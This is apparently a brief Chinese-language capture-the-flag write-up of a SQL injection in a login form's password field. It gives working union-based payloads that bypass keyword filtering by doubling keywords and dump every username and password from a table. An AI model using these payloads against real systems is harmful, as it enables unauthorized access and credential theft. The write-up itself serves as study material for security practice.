正常的sql流程(注入点是password)
’ 报错所以就是单引号闭合
尝试order by试出有多少列,发现不行
直接使用union 试试有多少列
-1’ union select 1,2,3 #
我们的语句好像被过滤了
尝试双写绕过
-1’ uniunionon selselectect 1,2,2 #
接下来就是不断地被过滤,直接给出完整的payload
-1' uniunionon selselectect 1,2,2 #
1' uniunionon selselectect 1,database(),group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
1' uniunionon selselectect 1,group_concat(username),group_concat(passwoorrd) frfromom b4bsql#